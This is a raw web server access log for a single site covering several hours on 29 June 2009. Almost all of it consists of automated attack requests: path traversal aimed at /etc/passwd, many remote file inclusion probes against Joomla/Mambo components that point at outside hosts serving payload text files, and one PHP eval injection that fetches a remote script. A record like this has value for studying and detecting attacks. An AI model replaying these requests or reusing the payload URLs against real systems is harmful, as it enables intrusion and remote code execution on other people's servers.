216.17.99.13 - - [29/Jun/2009:04:57:12 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:57:12 -0700] "GET /logs/access_090420.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:58:22 -0700] "GET /logs/access_090316.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
216.17.99.13 - - [29/Jun/2009:04:58:32 -0700] "GET /logs/access_090316.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:58:51 -0700] "GET /logs/access_090316.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.130.22 - - [29/Jun/2009:04:58:55 -0700] "GET /logs/access_090316.log/facileforms.frame.php?ff_compath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:05:08:32 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:05:08:32 -0700] "GET /logs/access_090413.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:05:08:32 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:05:08:32 -0700] "GET /logs/access_081222.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
85.214.78.119 - - [29/Jun/2009:05:08:53 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
85.214.78.119 - - [29/Jun/2009:05:08:53 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
85.214.78.119 - - [29/Jun/2009:05:08:55 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
85.214.78.119 - - [29/Jun/2009:05:08:55 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
66.155.118.125 - - [29/Jun/2009:05:12:12 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.155.118.125 - - [29/Jun/2009:05:12:53 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.155.118.125 - - [29/Jun/2009:05:12:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.155.118.125 - - [29/Jun/2009:05:12:53 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
217.147.29.190 - - [29/Jun/2009:05:14:36 -0700] "GET /logs/access_090413.log%20%20//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:14:57 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:14:57 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:14:57 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:15:05 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:15:08 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:15:08 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
209.61.244.6 - - [29/Jun/2009:05:15:41 -0700] "GET /components/com_events/events_config.php?mosConfig_absolute_path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
209.61.244.6 - - [29/Jun/2009:05:15:41 -0700] "GET /logs/components/com_events/events_config.php?mosConfig_absolute_path=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
117.121.208.254 - - [29/Jun/2009:05:18:35 -0700] "GET /logs/access_090412.log//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.haruuu.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
117.121.208.254 - - [29/Jun/2009:05:18:41 -0700] "GET /administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.haruuu.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
117.121.208.254 - - [29/Jun/2009:05:18:48 -0700] "GET /logs//administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.haruuu.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:05:21:17 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:05:21:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:05:21:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:21:52 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:21:52 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:21:52 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:23:29 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:23:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:23:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:05:24:01 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:24:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:24:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:24:56 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
125.131.116.12 - - [29/Jun/2009:05:25:29 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
125.131.116.12 - - [29/Jun/2009:05:25:29 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
125.131.116.12 - - [29/Jun/2009:05:25:30 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ymed.co.kr//upload/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:26:17 -0700] "GET /logs/access.log%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:26:41 -0700] "GET /logs/access.log%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:27:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:27:19 -0700] "GET /logs/access.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:27:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:28:25 -0700] "GET /logs/access.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:28:25 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:28:25 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.117.93.134 - - [29/Jun/2009:05:29:35 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
38.103.48.109 - - [29/Jun/2009:05:30:44 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.toulouseangloexchange.com"
89.186.1.54 - - [29/Jun/2009:05:34:48 -0700] "GET /logs/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
89.186.1.54 - - [29/Jun/2009:05:34:48 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
89.186.1.54 - - [29/Jun/2009:05:34:48 -0700] "GET /phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
89.186.1.54 - - [29/Jun/2009:05:35:17 -0700] "GET /logs/access_090420.log/phphtml.php?htmlclass_path=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:37 -0700] "GET /logs/access_081109.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:37 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:37 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:43:43 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:43:43 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:43:43 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:50 -0700] "GET /logs/access_090316.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:43:51 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:43:51 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:43:51 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:54 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:54 -0700] "GET /logs/access_081109.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:43:55 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.162.115.67 - - [29/Jun/2009:05:44:07 -0700] "GET /logs/access_090316.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:44:52 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:44:52 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:44:52 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:48:57 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:49:25 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
65.55.106.110 - - [29/Jun/2009:05:49:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.toulouseangloexchange.com"
83.13.191.186 - - [29/Jun/2009:05:50:23 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
203.241.231.63 - - [29/Jun/2009:05:59:24 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
203.241.231.63 - - [29/Jun/2009:05:59:33 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
203.241.231.63 - - [29/Jun/2009:05:59:33 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:05:59:37 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:05:59:37 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:06:27:06 -0700] "GET /logs/access.log%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:06:28:18 -0700] "GET /logs/access.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:06:28:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
119.93.90.155 - - [29/Jun/2009:06:28:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.enterprisenetwork.ie/mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
125.131.116.12 - - [29/Jun/2009:06:33:47 -0700] "GET /include/mail.inc.php?skin_board_path=http://alsoenglish.com/rgboard/header/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
125.131.116.12 - - [29/Jun/2009:06:33:47 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://alsoenglish.com/rgboard/header/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
208.96.54.70 - - [29/Jun/2009:06:44:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:06:52:19 -0700] "GET /phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:06:52:19 -0700] "GET /logs/access.log%20%20/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
72.82.228.83 - - [29/Jun/2009:06:52:19 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
208.96.54.70 - - [29/Jun/2009:06:52:52 -0700] "GET / HTTP/1.1" 200 919 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:06:58:35 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 919 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:06:58:35 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
218.150.78.245 - - [29/Jun/2009:06:58:35 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 200 3089 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
124.0.103.194 - - [29/Jun/2009:07:00:12 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
124.0.103.194 - - [29/Jun/2009:07:00:12 -0700] "GET /logs/access_090216.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
124.0.103.194 - - [29/Jun/2009:07:00:12 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
